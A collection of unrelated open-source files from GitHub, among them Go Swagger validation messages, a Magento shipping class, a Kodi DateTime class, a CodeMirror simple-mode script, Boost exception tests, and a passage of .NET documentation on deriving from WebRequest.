contains {,} or white space. This is probably no what you want." // ReadOnlyAndRequiredWarning ... ReadOnlyAndRequiredWarning = "Required property %s in %q should not be marked as both required and readOnly" // RefShouldNotHaveSiblingsWarning indicates that a $ref was found with a sibling definition. This results in the $ref taking over its siblings, // which is most likely not wanted. RefShouldNotHaveSiblingsWarning = "$ref property should have no sibling in %q.%s" // RequiredHasDefaultWarning indicates that a required parameter property should not have a default RequiredHasDefaultWarning = "%s in %s has a default value and is required as parameter" // UnusedDefinitionWarning ... UnusedDefinitionWarning = "definition %q is not used anywhere" // UnusedParamWarning ... UnusedParamWarning = "parameter %q is not used anywhere" // UnusedResponseWarning ... UnusedResponseWarning = "response %q is not used anywhere" ) // Additional error codes const ( // InternalErrorCode reports an internal technical error InternalErrorCode = http.StatusInternalServerError // NotFoundErrorCode indicates that a resource (e.g. a $ref) could not be found NotFoundErrorCode = http.StatusNotFound ) func invalidDocumentMsg() errors.Error { return errors.New(InternalErrorCode, InvalidDocumentError) } func invalidRefMsg(path string) errors.Error { return errors.New(NotFoundErrorCode, InvalidReferenceError, path) } func unresolvedReferencesMsg(err error) errors.Error { return errors.New(errors.CompositeErrorCode, UnresolvedReferencesError, err) } func noValidPathMsg() errors.Error { return errors.New(errors.CompositeErrorCode, NoValidPathErrorOrWarning) } func emptyPathParameterMsg(path string) errors.Error { return errors.New(errors.CompositeErrorCode, EmptyPathParameterError, path) } func nonUniqueOperationIDMsg(path string, i int) errors.Error { return errors.New(errors.CompositeErrorCode, NonUniqueOperationIDError, path, i) } func circularAncestryDefinitionMsg(path string, args interface{}) errors.Error { return errors.New(errors.CompositeErrorCode, CircularAncestryDefinitionError, path, args) } func duplicatePropertiesMsg(path string, args interface{}) errors.Error { return errors.New(errors.CompositeErrorCode, DuplicatePropertiesError, path, args) } func pathParamNotInPathMsg(path, param string) errors.Error { return errors.New(errors.CompositeErrorCode, PathParamNotInPathError, param, path) } func arrayRequiresItemsMsg(path, operation string) errors.Error { return errors.New(errors.CompositeErrorCode, ArrayRequiresItemsError, path, operation) } func arrayInParamRequiresItemsMsg(path, operation string) errors.Error { return errors.New(errors.CompositeErrorCode, ArrayInParamRequiresItemsError, path, operation) } func arrayInHeaderRequiresItemsMsg(path, operation string) errors.Error { return errors.New(errors.CompositeErrorCode, ArrayInHeaderRequiresItemsError, path, operation) } func invalidItemsPatternMsg(path, operation, pattern string) errors.Error { return errors.New(errors.CompositeErrorCode, InvalidItemsPatternError, path, operation, pattern) } func invalidPatternMsg(pattern, path string) errors.Error { return errors.New(errors.CompositeErrorCode, InvalidPatternError, pattern, path) } func requiredButNotDefinedMsg(path, definition string) errors.Error { return errors.New(errors.CompositeErrorCode, RequiredButNotDefinedError, path, definition) } func pathParamGarbledMsg(path, param string) errors.Error { return errors.New(errors.CompositeErrorCode, PathParamGarbledWarning, path, param) } func pathStrippedParamGarbledMsg(path string) errors.Error { return errors.New(errors.CompositeErrorCode, PathStrippedParamGarbledWarning, path) } func pathOverlapMsg(path, arg string) errors.Error { return errors.New(errors.CompositeErrorCode, PathOverlapError, path, arg) } func invalidPatternInParamMsg(operation, param, pattern string) errors.Error { return errors.New(errors.CompositeErrorCode, InvalidPatternInParamError, operation, param, pattern) } func pathParamRequiredMsg(operation, param string) errors.Error { return errors.New(errors.CompositeErrorCode, PathParamRequiredError, operation, param) } func bothFormDataAndBodyMsg(operation string) errors.Error { return errors.New(errors.CompositeErrorCode, BothFormDataAndBodyError, operation) } func multipleBodyParamMsg(operation string, args interface{}) errors.Error { return errors.New(errors.CompositeErrorCode, MultipleBodyParamError, operation, args) } func pathParamNotUniqueMsg(path, param, arg string) errors.Error { return errors.New(errors.CompositeErrorCode, PathParamNotUniqueError, path, param, arg) } func duplicateParamNameMsg(path, param, operation string) errors.Error { return errors.New(errors.CompositeErrorCode, DuplicateParamNameError, param, path, operation) } func unusedParamMsg(arg string) errors.Error { return errors.New(errors.CompositeErrorCode, UnusedParamWarning, arg) } func unusedDefinitionMsg(arg string) errors.Error { return errors.New(errors.CompositeErrorCode, UnusedDefinitionWarning, arg) } func unusedResponseMsg(arg string) errors.Error { return errors.New(errors.CompositeErrorCode, UnusedResponseWarning, arg) } func readOnlyAndRequiredMsg(path, param string) errors.Error { return errors.New(errors.CompositeErrorCode, ReadOnlyAndRequiredWarning, param, path) } func noParameterInPathMsg(param string) errors.Error { return errors.New(errors.CompositeErrorCode, NoParameterInPathError, param) } func requiredHasDefaultMsg(param, path string) errors.Error { return errors.New(errors.CompositeErrorCode, RequiredHasDefaultWarning, param, path) } func defaultValueDoesNotValidateMsg(param, path string) errors.Error { return errors.New(errors.CompositeErrorCode, DefaultValueDoesNotValidateError, param, path) } func defaultValueItemsDoesNotValidateMsg(param, path string) errors.Error { return errors.New(errors.CompositeErrorCode, DefaultValueItemsDoesNotValidateError, param, path) } func noValidResponseMsg(operation string) errors.Error { return errors.New(errors.CompositeErrorCode, NoValidResponseError, operation) } func defaultValueHeaderDoesNotValidateMsg(operation, header, path string) errors.Error { return errors.New(errors.CompositeErrorCode, DefaultValueHeaderDoesNotValidateError, operation, header, path) } func defaultValueHeaderItemsDoesNotValidateMsg(operation, header, path string) errors.Error { return errors.New(errors.CompositeErrorCode, DefaultValueHeaderItemsDoesNotValidateError, operation, header, path) } func invalidPatternInHeaderMsg(operation, header, path, pattern string, args interface{}) errors.Error { return errors.New(errors.CompositeErrorCode, InvalidPatternInHeaderError, operation, header, path, pattern, args) } func invalidPatternInMsg(path, in, pattern string) errors.Error { return errors.New(errors.CompositeErrorCode, InvalidPatternInError, path, in, pattern) } func defaultValueInDoesNotValidateMsg(operation, path string) errors.Error { return errors.New(errors.CompositeErrorCode, DefaultValueInDoesNotValidateError, operation, path) } func exampleValueDoesNotValidateMsg(param, path string) errors.Error { return errors.New(errors.CompositeErrorCode, ExampleValueDoesNotValidateError, param, path) } func exampleValueItemsDoesNotValidateMsg(param, path string) errors.Error { return errors.New(errors.CompositeErrorCode, ExampleValueItemsDoesNotValidateError, param, path) } func exampleValueHeaderDoesNotValidateMsg(operation, header, path string) errors.Error { return errors.New(errors.CompositeErrorCode, ExampleValueHeaderDoesNotValidateError, operation, header, path) } func exampleValueHeaderItemsDoesNotValidateMsg(operation, header, path string) errors.Error { return errors.New(errors.CompositeErrorCode, ExampleValueHeaderItemsDoesNotValidateError, operation, header, path) } func exampleValueInDoesNotValidateMsg(operation, path string) errors.Error { return errors.New(errors.CompositeErrorCode, ExampleValueInDoesNotValidateError, operation, path) } func examplesWithoutSchemaMsg(operation, response string) errors.Error { return errors.New(errors.CompositeErrorCode, ExamplesWithoutSchemaWarning, operation, response) } func examplesMimeNotSupportedMsg(operation, response string) errors.Error { return errors.New(errors.CompositeErrorCode, ExamplesMimeNotSupportedWarning, operation, response) } func refNotAllowedInHeaderMsg(path, header, ref string) errors.Error { return errors.New(errors.CompositeErrorCode, RefNotAllowedInHeaderError, path, header, ref) } func cannotResolveRefMsg(path, ref string, err error) errors.Error { return errors.New(errors.CompositeErrorCode, CannotResolveReferenceError, path, ref, err) } func invalidParameterDefinitionMsg(path, method, operationID string) errors.Error { return errors.New(errors.CompositeErrorCode, InvalidParameterDefinitionError, path, method, operationID) } func invalidParameterDefinitionAsSchemaMsg(path, method, operationID string) errors.Error { return errors.New(errors.CompositeErrorCode, InvalidParameterDefinitionAsSchemaError, path, method, operationID) } // disabled //func invalidResponseDefinitionAsSchemaMsg(path, method string) errors.Error { // return errors.New(errors.CompositeErrorCode, InvalidResponseDefinitionAsSchemaError, path, method) //} func someParametersBrokenMsg(path, method, operationID string) errors.Error { return errors.New(errors.CompositeErrorCode, SomeParametersBrokenError, path, method, operationID) } func refShouldNotHaveSiblingsMsg(path, operationID string) errors.Error { return errors.New(errors.CompositeErrorCode, RefShouldNotHaveSiblingsWarning, operationID, path) }
{ "pile_set_name": "Github" }
package com.stuffwithstuff.bantam; public enum TokenType { LEFT_PAREN, RIGHT_PAREN, COMMA, ASSIGN, PLUS, MINUS, ASTERISK, SLASH, CARET, TILDE, BANG, QUESTION, COLON, NAME, EOF; /** * If the TokenType represents a punctuator (i.e. a token that can split an * identifier like '+', this will get its text. */ public Character punctuator() { switch (this) { case LEFT_PAREN: return '('; case RIGHT_PAREN: return ')'; case COMMA: return ','; case ASSIGN: return '='; case PLUS: return '+'; case MINUS: return '-'; case ASTERISK: return '*'; case SLASH: return '/'; case CARET: return '^'; case TILDE: return '~'; case BANG: return '!'; case QUESTION: return '?'; case COLON: return ':'; default: return null; } } }
{ "pile_set_name": "Github" }
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html > <head><title></title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="generator" content="TeX4ht (http://www.tug.org/tex4ht/)"> <meta name="originator" content="TeX4ht (http://www.tug.org/tex4ht/)"> <!-- html --> <meta name="src" content="bigdata.tex"> <meta name="date" content="2016-05-10 11:14:00"> <link rel="stylesheet" type="text/css" href="bigdata.css"> </head><body > <div class="footnote-text"> <!--l. 1008--><p class="indent" > <span class="footnote-mark"><a id="fn5x7"> <sup class="textsuperscript">5</sup></a></span><span class="cmr-10">Earlier versions used the MapFile</span><a id="dx15-58006"></a> <span class="cmr-10">format. The MapFile is actually</span> <span class="cmr-10">a directory that contains two SequenceFile: the data file and the index file.</span> </div> </body></html>
{ "pile_set_name": "Github" }
// Copyright (c) Microsoft Open Technologies, Inc. All rights reserved. See License.txt in the project root for license information. namespace System.Data.Entity.TestModels.ExtraLazyLoading { public interface IHasIsLoaded { bool IsLoaded { get; set; } } }
{ "pile_set_name": "Github" }
<?php /** * Magento * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * http://opensource.org/licenses/osl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to [email protected] so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade Magento to newer * versions in the future. If you wish to customize Magento for your * needs please refer to http://www.magento.com for more information. * * @category Mage * @package Mage_Usa * @copyright Copyright (c) 2006-2020 Magento, Inc. (http://www.magento.com) * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0) */ class Mage_Usa_Model_Shipping_Carrier_Dhl_Source_Freemethod extends Mage_Usa_Model_Shipping_Carrier_Dhl_Source_Method { public function toOptionArray() { $arr = parent::toOptionArray(); array_unshift($arr, array('value'=>'', 'label'=>Mage::helper('shipping')->__('None'))); return $arr; } }
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <string xmlns="http://tempuri.org/">{ "Info": [ { "IsSuccess": "True", "InAddress": "臺南市永康區中華一路70號", "InSRS": "EPSG:4326", "InFuzzyType": "[單雙號機制]+[最近門牌號機制]", "InFuzzyBuffer": "0", "InIsOnlyFullMatch": "False", "InIsLockCounty": "True", "InIsLockTown": "False", "InIsLockVillage": "False", "InIsLockRoadSection": "False", "InIsLockLane": "False", "InIsLockAlley": "False", "InIsLockArea": "False", "InIsSameNumber_SubNumber": "True", "InCanIgnoreVillage": "True", "InCanIgnoreNeighborhood": "True", "InReturnMaxCount": "0", "OutTotal": "1", "OutMatchType": "完全比對", "OutMatchCode": "[臺南市]\tFULL:1", "OutTraceInfo": "[臺南市]\t { 完全比對 } 找到符合的門牌地址" } ], "AddressList": [ { "FULL_ADDR": "臺南市永康區中興里16鄰中華一路70號", "COUNTY": "臺南市", "TOWN": "永康區", "VILLAGE": "中興里", "NEIGHBORHOOD": "16鄰", "ROAD": "中華一路", "SECTION": "", "LANE": "", "ALLEY": "", "SUB_ALLEY": "", "TONG": "", "NUMBER": "70號", "X": 120.237409, "Y": 23.004478 } ] }</string>
{ "pile_set_name": "Github" }
/* * Copyright (C) 2005-2013 Team XBMC * http://www.xbmc.org * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. * */ #include <ctime> #include <clocale> #include <cstring> #include <cstdio> #include "DateTime.h" namespace MPTV { void CDateTime::InitLocale(void) { // Follow system default for date and time formatting // because we cannot access XBMC's locale settings from the PVR addon setlocale(LC_ALL, ""); } CDateTime::CDateTime() { InitLocale(); memset(&m_time, 0, sizeof(m_time)); } CDateTime::CDateTime(const time_t& dateTime) { InitLocale(); SetFromTime(dateTime); } CDateTime::CDateTime(const struct tm& dateTime) { InitLocale(); m_time = dateTime; } CDateTime::~CDateTime() {} int CDateTime::GetDay() const { return m_time.tm_mday; } int CDateTime::GetMonth() const { return (m_time.tm_mon + 1); } int CDateTime::GetYear() const { return (m_time.tm_year + 1900); } int CDateTime::GetHour() const { return (m_time.tm_hour); } int CDateTime::GetMinute() const { return (m_time.tm_min); } int CDateTime::GetSecond() const { return (m_time.tm_sec); } int CDateTime::GetDayOfWeek() const { return (m_time.tm_wday); } time_t CDateTime::GetAsTime() const { time_t retval; struct tm tm_time = m_time; retval = mktime (&tm_time); if(retval < 0) retval = 0; return retval; } bool CDateTime::SetFromDateTime(const std::string& dateTime) { int year, month ,day; int hour, minute, second; int count; count = sscanf(dateTime.c_str(), "%4d-%2d-%2d %2d:%2d:%2d", &year, &month, &day, &hour, &minute, &second); if(count != 6) return false; m_time.tm_hour = hour; m_time.tm_min = minute; m_time.tm_sec = second; m_time.tm_year = year - 1900; m_time.tm_mon = month - 1; m_time.tm_mday = day; // Make the other fields empty: m_time.tm_isdst = -1; m_time.tm_wday = 0; m_time.tm_yday = 0; return true; } void CDateTime::SetFromTime(const time_t& time) { m_time = *localtime( &time ); } void CDateTime::SetFromTM(const struct tm& time) { m_time = time; } void CDateTime::GetAsLocalizedDate(std::string & strDate) const { const unsigned int bufSize = 64; char buffer[bufSize]; strftime(buffer, bufSize, "%x", &m_time); strDate = buffer; } void CDateTime::GetAsLocalizedTime(std::string & strTime) const { const unsigned int bufSize = 64; char buffer[bufSize]; strftime(buffer, bufSize, "%H:%M", &m_time); strTime = buffer; } int CDateTime::operator -(const CDateTime& right) const { time_t leftTime = GetAsTime(); time_t rightTime = right.GetAsTime(); return (int) (leftTime-rightTime); } const CDateTime& CDateTime::operator =(const time_t& right) { SetFromTime(right); return *this; } const CDateTime& CDateTime::operator =(const tm& right) { m_time = right; return *this; } bool CDateTime::operator ==(const time_t& right) const { time_t left = GetAsTime(); return (left == right); } const CDateTime& CDateTime::operator +=(const int seconds) { time_t left = GetAsTime(); left += seconds; SetFromTime(left); return *this; } time_t CDateTime::Now() { time_t now; time(&now); return now; } } // namespace MPTV
{ "pile_set_name": "Github" }
.p-file_list { background: $bg2; } .p-file_viewer__empty { color: $disabled; } .p-file_viewer__nav { background: $bg; } .c-file_container { background: $bg; } .c-file__title { color: $fg; } .c-file__meta { color: $text; } .c-file__slide--meta { background: $bg; } .c-file__icon { &:after { color: $bg; border: 3px solid $bg; } } .c-file__thumb { border: 1px solid $borderLight; } .c-file__media--video { background: $bg; } .c-file__actions--overflow { background: $active; } .c-file__action_button { background-color: $button; color: $fg; &:link, &:visited { color: $accent2; } &:active, &:focus, &:hover { background: $selectBg; color: $primary; } &:active { background: $active; } } .c-file__action_button--dark { background-color: $button; color: $fg; &:active, &:hover { background-color: $active; color: $selectFg; } &:after { border-color: $button; } } .c-file__highlight { background-color: $hl; } .c-pillow_file_container { background: $bg; border: 1px solid $border; &.c-pillow_file_container--focus-within, &:hover { border-color: $borderLight; } } .c-pillow_file_container--full_width { border-color: $borderLight; &.c-pillow_file_container--focus-within, &:hover { background: $tree; } } .c-pillow_file_container--active_download { background-color: $accent2; .c-pillow_file__description, .c-pillow_file__title { color: $primary; } } .c-pillow_file_container--download .c-pillow_file__slide { background: $bg; } .c-pillow_file--active_download .c-pillow_file__slide { background: $accent2; } .c-pillow_file__header { &:link { &:focus, &:hover { color: $primary; } } color: $fg; } .c-pillow_file__header--hidden, .c-pillow_file__header--tombstone { color: $disabled; } .c-pillow_file__swap { .c-pillow_file__slide { background: $bg; } } .c-pillow_file__icon--slide:after { border: 3px solid $borderLight; color: $fg; } .c-pillow_file__icon--hidden, .c-pillow_file__icon--not_found, .c-pillow_file__icon--tombstone { background: $excluded; } .c-pillow_file__description { color: $text; } .c-pillow_file__title { color: $fg; } .c-pillow_file__preview { border: 1px solid $borderLight; } .c-pillow_file__video { background: $bg; } .c-pillow_file__video:focus, .c-pillow_file__video_container:focus { box-shadow: 0 0 0 1px $primary, 0 0 0 5px $primaryT; } .c-pillow_file__content--collapsed { &:after { background: linear-gradient(0deg, $bg, hsla(0, 0%, 100%, 0) 40px) } } .c-pillow_file__expandable_pill__button { background: $accent; color: $selectFg; } .p-file_viewer__header__meta__name { color: $text; } .p-file_viewer__header__edit_btn { color: $fg; } .p-file_viewer__header__separator { background: $border; } .p-file_viewer__header__button:hover { color: $primary; } .p-file_image_thumbnail__wrapper { background-color: $bg2; &:after { border: 1px solid rgba(0, 0, 0, 0.1); } } .p-new_file_menu__gdoc_icon { color: $blue; } .p-new_file_menu__gsheet_icon { color: $green; } .p-new_file_menu__gpres_icon { color: $yellow; }
{ "pile_set_name": "Github" }
//Copyright (c) 2006-2009 Emil Dotchevski and Reverge Studios, Inc. //Distributed under the Boost Software License, Version 1.0. (See accompanying //file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) #include <boost/exception_ptr.hpp> #include <boost/exception/get_error_info.hpp> #include <boost/exception/info.hpp> #include <boost/detail/lightweight_test.hpp> #include <boost/detail/workaround.hpp> #if BOOST_WORKAROUND(__CODEGEARC__, BOOST_TESTED_AT(0x610)) struct tag_test {}; #endif typedef boost::error_info<struct tag_test,int> test; struct test_boost_exception: boost::exception { }; void throw_boost_exception() { throw test_boost_exception() << test(42); } void throw_unknown_exception() { struct test_exception: std::exception { }; throw test_exception(); } int main() { try { throw_boost_exception(); } catch( ... ) { boost::exception_ptr ep=boost::current_exception(); try { rethrow_exception(ep); } catch( boost::unknown_exception & x ) { if( int const * d=boost::get_error_info<test>(x) ) BOOST_TEST( 42==*d ); else BOOST_TEST(false); } catch( boost::exception & x ) { //Yay! Non-intrusive cloning supported! if( int const * d=boost::get_error_info<test>(x) ) BOOST_TEST( 42==*d ); else BOOST_TEST(false); } catch( ... ) { BOOST_TEST(false); } try { rethrow_exception(ep); } catch( boost::exception & x ) { if( int const * d=boost::get_error_info<test>(x) ) BOOST_TEST( 42==*d ); else BOOST_TEST(false); } catch( ... ) { BOOST_TEST(false); } } try { throw_unknown_exception(); } catch( ... ) { boost::exception_ptr ep=boost::current_exception(); try { rethrow_exception(ep); } catch( boost::unknown_exception & ) { } catch( std::exception & ) { //Yay! Non-intrusive cloning supported! } catch( ... ) { BOOST_TEST(false); } try { rethrow_exception(ep); } catch( boost::exception & ) { } catch( std::exception & ) { //Yay! Non-intrusive cloning supported! } catch( ... ) { BOOST_TEST(false); } } return boost::report_errors(); }
{ "pile_set_name": "Github" }
// CodeMirror, copyright (c) by Marijn Haverbeke and others // Distributed under an MIT license: http://codemirror.net/LICENSE (function(mod) { if (typeof exports == "object" && typeof module == "object") // CommonJS mod(require("../../lib/codemirror")); else if (typeof define == "function" && define.amd) // AMD define(["../../lib/codemirror"], mod); else // Plain browser env mod(CodeMirror); })(function(CodeMirror) { "use strict"; CodeMirror.defineSimpleMode = function(name, states) { CodeMirror.defineMode(name, function(config) { return CodeMirror.simpleMode(config, states); }); }; CodeMirror.simpleMode = function(config, states) { ensureState(states, "start"); var states_ = {}, meta = states.meta || {}, hasIndentation = false; for (var state in states) if (state != meta && states.hasOwnProperty(state)) { var list = states_[state] = [], orig = states[state]; for (var i = 0; i < orig.length; i++) { var data = orig[i]; list.push(new Rule(data, states)); if (data.indent || data.dedent) hasIndentation = true; } } var mode = { startState: function() { return {state: "start", pending: null, local: null, localState: null, indent: hasIndentation ? [] : null}; }, copyState: function(state) { var s = {state: state.state, pending: state.pending, local: state.local, localState: null, indent: state.indent && state.indent.slice(0)}; if (state.localState) s.localState = CodeMirror.copyState(state.local.mode, state.localState); if (state.stack) s.stack = state.stack.slice(0); for (var pers = state.persistentStates; pers; pers = pers.next) s.persistentStates = {mode: pers.mode, spec: pers.spec, state: pers.state == state.localState ? s.localState : CodeMirror.copyState(pers.mode, pers.state), next: s.persistentStates}; return s; }, token: tokenFunction(states_, config), innerMode: function(state) { return state.local && {mode: state.local.mode, state: state.localState}; }, indent: indentFunction(states_, meta) }; if (meta) for (var prop in meta) if (meta.hasOwnProperty(prop)) mode[prop] = meta[prop]; return mode; }; function ensureState(states, name) { if (!states.hasOwnProperty(name)) throw new Error("Undefined state " + name + "in simple mode"); } function toRegex(val, caret) { if (!val) return /(?:)/; var flags = ""; if (val instanceof RegExp) { if (val.ignoreCase) flags = "i"; val = val.source; } else { val = String(val); } return new RegExp((caret === false ? "" : "^") + "(?:" + val + ")", flags); } function asToken(val) { if (!val) return null; if (typeof val == "string") return val.replace(/\./g, " "); var result = []; for (var i = 0; i < val.length; i++) result.push(val[i] && val[i].replace(/\./g, " ")); return result; } function Rule(data, states) { if (data.next || data.push) ensureState(states, data.next || data.push); this.regex = toRegex(data.regex); this.token = asToken(data.token); this.data = data; } function tokenFunction(states, config) { return function(stream, state) { if (state.pending) { var pend = state.pending.shift(); if (state.pending.length == 0) state.pending = null; stream.pos += pend.text.length; return pend.token; } if (state.local) { if (state.local.end && stream.match(state.local.end)) { var tok = state.local.endToken || null; state.local = state.localState = null; return tok; } else { var tok = state.local.mode.token(stream, state.localState), m; if (state.local.endScan && (m = state.local.endScan.exec(stream.current()))) stream.pos = stream.start + m.index; return tok; } } var curState = states[state.state]; for (var i = 0; i < curState.length; i++) { var rule = curState[i]; var matches = (!rule.data.sol || stream.sol()) && stream.match(rule.regex); if (matches) { if (rule.data.next) { state.state = rule.data.next; } else if (rule.data.push) { (state.stack || (state.stack = [])).push(state.state); state.state = rule.data.push; } else if (rule.data.pop && state.stack && state.stack.length) { state.state = state.stack.pop(); } if (rule.data.mode) enterLocalMode(config, state, rule.data.mode, rule.token); if (rule.data.indent) state.indent.push(stream.indentation() + config.indentUnit); if (rule.data.dedent) state.indent.pop(); if (matches.length > 2) { state.pending = []; for (var j = 2; j < matches.length; j++) if (matches[j]) state.pending.push({text: matches[j], token: rule.token[j - 1]}); stream.backUp(matches[0].length - (matches[1] ? matches[1].length : 0)); return rule.token[0]; } else if (rule.token && rule.token.join) { return rule.token[0]; } else { return rule.token; } } } stream.next(); return null; }; } function cmp(a, b) { if (a === b) return true; if (!a || typeof a != "object" || !b || typeof b != "object") return false; var props = 0; for (var prop in a) if (a.hasOwnProperty(prop)) { if (!b.hasOwnProperty(prop) || !cmp(a[prop], b[prop])) return false; props++; } for (var prop in b) if (b.hasOwnProperty(prop)) props--; return props == 0; } function enterLocalMode(config, state, spec, token) { var pers; if (spec.persistent) for (var p = state.persistentStates; p && !pers; p = p.next) if (spec.spec ? cmp(spec.spec, p.spec) : spec.mode == p.mode) pers = p; var mode = pers ? pers.mode : spec.mode || CodeMirror.getMode(config, spec.spec); var lState = pers ? pers.state : CodeMirror.startState(mode); if (spec.persistent && !pers) state.persistentStates = {mode: mode, spec: spec.spec, state: lState, next: state.persistentStates}; state.localState = lState; state.local = {mode: mode, end: spec.end && toRegex(spec.end), endScan: spec.end && spec.forceEnd !== false && toRegex(spec.end, false), endToken: token && token.join ? token[token.length - 1] : token}; } function indexOf(val, arr) { for (var i = 0; i < arr.length; i++) if (arr[i] === val) return true; } function indentFunction(states, meta) { return function(state, textAfter, line) { if (state.local && state.local.mode.indent) return state.local.mode.indent(state.localState, textAfter, line); if (state.indent == null || state.local || meta.dontIndentStates && indexOf(state.state, meta.dontIndentStates) > -1) return CodeMirror.Pass; var pos = state.indent.length - 1, rules = states[state.state]; scan: for (;;) { for (var i = 0; i < rules.length; i++) { var rule = rules[i]; if (rule.data.dedent && rule.data.dedentIfLineStart !== false) { var m = rule.regex.exec(textAfter); if (m && m[0]) { pos--; if (rule.next || rule.push) rules = states[rule.next || rule.push]; textAfter = textAfter.slice(m[0].length); continue scan; } } } break; } return pos < 0 ? 0 : state.indent[pos]; }; } });
{ "pile_set_name": "Github" }
--- title: "Deriving from WebRequest" ms.date: "03/30/2017" helpviewer_keywords: - "WebRequest class, pluggable protocols" - "protocol-specific request handler" - "sending data, pluggable protocols" - "pluggable protocols, class criteria" - "Internet, pluggable protocols" - "receiving data, pluggable protocols" - "protocols, pluggable" ms.assetid: 9810c177-973e-43d7-823c-14960bd625ea --- # Deriving from WebRequest The <xref:System.Net.WebRequest> class is an abstract base class that provides the basic methods and properties for creating a protocol-specific request handler that fits the .NET Framework pluggable protocol model. Applications that use the **WebRequest** class can request data using any supported protocol without needing to specify the protocol used. Two criteria must be met in order for a protocol-specific class to be used as a pluggable protocol: The class must implement the <xref:System.Net.IWebRequestCreate> interface, and it must register with the <xref:System.Net.WebRequest.RegisterPrefix%2A?displayProperty=nameWithType> method. The class must override all the abstract methods and properties of **WebRequest** to provide the pluggable interface. **WebRequest** instances are intended for one-time use; if you want to make another request, create a new **WebRequest**. **WebRequest** supports the <xref:System.Runtime.Serialization.ISerializable> interface to enable developers to serialize a template **WebRequest** and then reconstruct the template for additional requests. ## IWebRequest Create Method The <xref:System.Net.IWebRequestCreate.Create%2A> method is responsible for initializing a new instance of the protocol-specific class. When a new **WebRequest** is created, the <xref:System.Net.WebRequest.Create%2A?displayProperty=nameWithType> method matches the requested URI with the URI prefixes registered with the **RegisterPrefix** method. The **Create** method of the proper protocol-specific descendant must return an initialized instance of the descendant capable of performing a standard request/response transaction for the protocol without needing any protocol-specific fields modified. ## ConnectionGroupName Property The <xref:System.Net.WebRequest.ConnectionGroupName%2A> property is used to name a group of connections to a resource so that multiple requests can be made over a single connection. To implement connection-sharing, you must use a protocol-specific method of pooling and assigning connections. For example, the provided <xref:System.Net.ServicePointManager> class implements connection sharing for the <xref:System.Net.HttpWebRequest> class. The **ServicePointManager** class creates a <xref:System.Net.ServicePoint> that provides a connection to a specific server for each connection group. ## ContentLength Property The <xref:System.Net.WebRequest.ContentLength%2A> property specifies the number of bytes of data that will be sent to the server when uploading data. Typically the <xref:System.Net.WebRequest.Method%2A> property must be set to indicate that an upload is taking place when the **ContentLength** property is set to a value greater than zero. ## ContentType Property The <xref:System.Net.WebRequest.ContentType%2A> property provides any special information that your protocol requires you to send to the server to identify the type of content that you are sending. Typically this is the MIME content type of any data uploaded. ## Credentials Property The <xref:System.Net.WebRequest.Credentials%2A> property contains information needed to authenticate the request with the server. You must implement the details of the authentication process for your protocol. The <xref:System.Net.AuthenticationManager> class is responsible for authenticating requests and providing an authentication token. The class that provides the credentials used by your protocol must implement the <xref:System.Net.ICredentials> interface. ## Headers Property The <xref:System.Net.WebRequest.Headers%2A> property contains an arbitrary collection of name/value pairs of metadata associated with the request. Any metadata needed by the protocol that can be expressed as a name/value pair can be included in the **Headers** property. Typically this information must be set before calling the <xref:System.Net.WebRequest.GetRequestStream%2A> or <xref:System.Net.WebRequest.GetResponse%2A> methods; once the request has been made, the metadata is considered read-only. You are not required to use the **Headers** property to use header metadata. Protocol-specific metadata can be exposed as properties; for example, the <xref:System.Net.HttpWebRequest.UserAgent%2A?displayProperty=nameWithType> property exposes the **User-Agent** HTTP header. When you expose header metadata as a property, you should not allow the same property to be set using the **Headers** property. ## Method Property The <xref:System.Net.WebRequest.Method%2A> property contains the verb or action that the request is asking the server to perform. The default for the **Method** property must enable a standard request/response action without requiring any protocol-specific properties to be set. For example, the <xref:System.Net.HttpWebResponse.Method%2A> method defaults to GET, which requests a resource from a Web server and returns the response. Typically the **ContentLength** property must be set to a value greater than zero when the **Method** property is set to a verb or action that indicates that an upload is taking place. ## PreAuthenticate Property Applications set the <xref:System.Net.WebRequest.PreAuthenticate%2A> property to indicate that authentication information should be sent with the initial request rather than waiting for an authentication challenge. The **PreAuthenticate** property is only meaningful if the protocol supports authentication credentials sent with the initial request. ## Proxy Property The <xref:System.Net.WebRequest.Proxy%2A> property contains an <xref:System.Net.IWebProxy> interface that is used to access the requested resource. The **Proxy** property is meaningful only if your protocol supports proxied requests. You must set the default proxy if one is required by your protocol. In some environments, such as behind a corporate firewall, your protocol might be required to use a proxy. In that case, you must implement the **IWebProxy** interface to create a proxy class that will work for your protocol. ## RequestUri Property The <xref:System.Net.WebRequest.RequestUri%2A> property contains the URI that was passed to the **WebRequest.Create** method. It is read-only and cannot be changed once the **WebRequest** has been created. If your protocol supports redirection, the response can come from a resource identified by a different URI. If you need to provide access to the URI that responded, you must provide an additional property containing that URI. ## Timeout Property The <xref:System.Net.WebRequest.Timeout%2A> property contains the length of time, in milliseconds, to wait before the request times out and throws an exception. **Timeout** applies only to synchronous requests made with the <xref:System.Net.WebRequest.GetResponse%2A> method; asynchronous requests must use the <xref:System.Net.WebRequest.Abort%2A> method to cancel a pending request. Setting the **Timeout** property is meaningful only if the protocol-specific class implements a time-out process. ## Abort Method The <xref:System.Net.WebRequest.Abort%2A> method cancels a pending asynchronous request to a server. After the request has been canceled, calling **GetResponse**, **BeginGetResponse**, **EndGetResponse**, **GetRequestStream**, **BeginGetRequestStream**, or **EndGetRequestStream** will throw a <xref:System.Net.WebException> with the <xref:System.Net.WebException.Status%2A> property set to <xref:System.Net.WebExceptionStatus>. ## BeginGetRequestStream and EndGetRequestStream Methods The 